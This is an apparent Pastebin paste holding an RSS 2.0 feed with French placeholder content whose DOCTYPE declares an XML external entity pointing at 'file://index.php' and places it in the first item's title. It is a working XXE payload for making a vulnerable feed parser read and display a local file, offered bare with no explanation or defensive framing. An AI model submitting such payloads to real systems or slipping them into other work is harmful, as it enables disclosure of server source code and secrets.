Advertisement
Guest User

Untitled

a guest
Mar 23rd, 2017
61
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.82 KB | None | 0 0
  1. <?xml version="1.0" encoding="UTF-8"?>
  2. <!DOCTYPE title [
  3. <!ELEMENT title ANY >
  4. <!ENTITY xxe SYSTEM "file://index.php" >]>
  5. <rss version="2.0">
  6. <channel>
  7. <title>Mon site</title>
  8. <description>Ceci est un exemple de flux RSS 2.0</description>
  9. <lastBuildDate>Sat, 07 Sep 2002 00:00:01 GMT</lastBuildDate>
  10. <link>http://www.example.org</link>
  11. <item>
  12. <title>&xxe;</title>
  13. <description>Ceci est ma première actualité</description>
  14. <pubDate>Sat, 07 Sep 2002 00:00:01 GMT</pubDate>
  15. <link>http://www.example.org/actu1</link>
  16. </item>
  17. <item>
  18. <title>Actualité N°2</title>
  19. <description>Ceci est ma seconde actualité</description>
  20. <pubDate>Sat, 07 Sep 2002 00:00:01 GMT</pubDate>
  21. <link>http://www.example.org/actu2</link>
  22. </item>
  23. </channel>
  24. </rss>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement